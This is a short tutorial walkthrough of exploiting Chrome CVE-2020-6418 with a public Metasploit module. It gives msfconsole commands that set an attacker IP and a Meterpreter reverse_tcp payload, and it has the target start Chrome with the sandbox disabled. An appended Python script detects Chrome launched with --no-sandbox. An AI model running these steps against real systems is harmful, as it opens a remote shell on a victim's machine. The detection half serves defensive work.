Hello everyone, this post demonstrates exploitation of a Google Chrome vulnerability that occurred in version 80.0.3987.122. It is CVE-2020-6418, which allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2020-6418
Metasploit Framework includes an exploit for this vulnerability, so let's search for modules related to Chrome and select the specific one that we need.
Start msfconsole and search for modules related to Chrome:

    msfconsole
    search chrome

Select and copy the exploit given below from the list, then set srvhost (the attacker IP) and uripath:

    use exploit/multi/browser/chrome_jscreate_sideeffect
    set srvhost 192.168.43.19
    set uripath /

We also need to set the payload. We are targeting Windows 10 x64:

    set payload windows/x64/meterpreter/reverse_tcp
    set lhost 192.168.43.19
    exploit

Now we need to share the link that serves the crafted HTML with our target.
On the target system, make sure that you are launching Chrome with the no-sandbox option. To do that, open cmd, run the command below, and then open the link:

    start chrome --no-sandbox
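
The demonstration above depends on Chrome being started with the no-sandbox option, so a process command line carrying that switch is a useful thing to alert on. The following is an added example, not part of the original post, that checks process-creation records for it; the host names, paths and sample records are constructed, and the handling of switch prefixes and case is an assumption about how Chromium parses its command line on Windows.

```python
import ntpath
import re

# Assumption (not from the page): on Windows, Chromium accepts "--", "-" and
# "/" as switch prefixes and compares switch names case-insensitively.
PREFIXES = ("--", "-", "/")
FLAG = "no-sandbox"

def tokenize(cmdline):
    """Split a Windows command line into arguments, honouring double quotes."""
    parts = re.findall(r'(?:"[^"]*"|\S)+', cmdline)
    return [p.replace('"', "") for p in parts]

def chrome_without_sandbox(cmdline):
    """True if cmdline starts chrome.exe with the no-sandbox switch."""
    args = tokenize(cmdline)
    if not args or ntpath.basename(args[0]).lower() != "chrome.exe":
        return False
    for arg in args[1:]:
        if arg == "--":  # switch terminator: what follows is URLs/paths
            return False
        prefix = next((p for p in PREFIXES if arg.startswith(p)), None)
        if prefix and arg[len(prefix):].split("=", 1)[0].lower() == FLAG:
            return True
    return False

CHROME = r"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
# Constructed process-creation records: (host, command line).
SAMPLE_EVENTS = [
    ("WS-01", f'"{CHROME}" --no-sandbox'),
    ("WS-02", f'"{CHROME}" https://example.com/'),
    ("WS-03", r'C:\Tools\chrome.exe /No-Sandbox --user-data-dir="C:\Temp\p 1"'),
    ("WS-04", f'"{CHROME}" -- --no-sandbox'),
    ("WS-05", "notepad.exe --no-sandbox"),
]

def flagged_hosts(events):
    """Hosts whose records show Chrome started with the sandbox disabled."""
    return [host for host, cmd in events if chrome_without_sandbox(cmd)]

if __name__ == "__main__":
    for host in flagged_hosts(SAMPLE_EVENTS):
        print(f"ALERT {host}: chrome.exe started with --no-sandbox")
```

In practice the command lines would come from process-creation logging on the endpoints rather than from an inline list.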